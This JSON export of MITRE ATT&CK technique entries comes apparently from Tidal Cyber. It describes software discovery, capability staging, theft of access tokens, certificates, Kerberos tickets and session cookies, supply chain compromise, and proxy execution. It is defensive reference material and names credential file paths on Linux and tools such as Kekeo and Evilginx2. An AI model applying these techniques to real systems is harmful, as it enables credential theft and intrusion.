"description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e9bff6ff-3142-4910-8f67-19b868912602",
|
||
"value": "Software Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup>\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) when a user browses to a site.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup><sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>\n* Staging web resources for a link target to be used with spearphishing.<sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup>\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242).<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup>\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)).<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ec2a76e6-3530-43e1-9e80-686e4b214ac8",
|
||
"value": "Stage Capabilities"
|
||
},
|
||
{
|
||
"description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.<sup>[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]</sup> Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.<sup>[[Cider Security Top 10 CICD Security Risks](https://app.tidalcyber.com/references/512974b7-b464-52af-909a-2cb880b524e5)]</sup> If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.<sup>[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)]</sup><sup>[[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)]</sup> An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.<sup>[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)]</sup><sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.<sup>[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)]</sup> Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).<sup>[[Microsoft - Azure AD Identity Tokens - Aug 2019](https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]</sup>\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens<sup>[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)]</sup>, allowing them to obtain new access tokens without prompting the user. \n\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f78f2c87-626a-468f-93a5-31b61be17727",
|
||
"value": "Steal Application Access Token"
|
||
},
|
||
{
|
||
"description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.<sup>[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)]</sup><sup>[[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]</sup>\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)<sup>[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)]</sup>, misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.<sup>[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)]</sup><sup>[[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)]</sup><sup>[[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)]</sup> With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup> Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b8c27b52-3e73-448d-8a7c-3e814c8e3889",
|
||
"value": "Steal or Forge Authentication Certificates"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).<sup>[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)]</sup> Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.<sup>[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]</sup>\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.<sup>[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)]</sup> On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.<sup>[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)]</sup><sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup><sup>[[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]</sup>\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.<sup>[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)]</sup><sup>[[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]</sup>\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0fef0394-7cf6-4797-8a5e-1cbfd31ee501",
|
||
"value": "Steal or Forge Kerberos Tickets"
|
||
},
|
||
{
|
||
"description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>\n\nThere are several examples of malware targeting cookies from web browsers on the local system.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup> Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) by tricking victims into running malicious JavaScript in their browser.<sup>[[Talos Roblox Scam 2023](https://app.tidalcyber.com/references/9371ee4a-ac23-5acb-af3f-132ef3645392)]</sup><sup>[[Krebs Discord Bookmarks 2023](https://app.tidalcyber.com/references/1d0a21f4-9a8e-5514-894a-3d55263ff973)]</sup>\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.<sup>[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)]</sup><sup>[[GitHub Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]</sup>\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to login to the corresponding web application.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "17f9e46d-4e3d-4491-a0d9-0cc042531d6e",
|
||
"value": "Steal Web Session Cookie"
|
||
},
|
||
{
|
||
"description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.<sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup> Adversaries may also create or steal code signing certificates to acquire trust on target systems.<sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup><sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "73a8b954-93fe-466c-b73d-bd35bb08c3e7",
|
||
"value": "Subvert Trust Controls"
|
||
},
|
||
{
|
||
"description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)<sup>[[IBM Storwize](https://app.tidalcyber.com/references/321cf27a-327d-4824-84d0-56634d3b86f5)]</sup><sup>[[Schneider Electric USB Malware](https://app.tidalcyber.com/references/e4d8ce63-8626-4c8f-a437-b6a120ff61c7)]</sup> \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b72c8a96-5e03-40c2-ac0c-f77b73fe493f",
|
||
"value": "Supply Chain Compromise"
|
||
},
|
||
{
|
||
"description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.<sup>[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)]</sup><sup>[[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4060ad55-7ff1-4127-acad-808b2bc77655",
|
||
"value": "System Binary Proxy Execution"
|
||
},
|
||
{
|
||
"description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. <code>show version</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.<sup>[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)]</sup><sup>[[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a2961a00-450e-45a5-b293-f699d9f3b4ea",
|
||
"value": "System Information Discovery"
|
||
},
|
||
{
|
||
"description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup><sup>[[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)]</sup> Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup> In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.<sup>[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)]</sup><sup>[[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]</sup>\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.<sup>[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "90e6a093-3e87-4d74-8b68-38c7d7e5e93c",
|
||
"value": "System Location Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), [ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6)/[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]</sup>\n\nAdversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
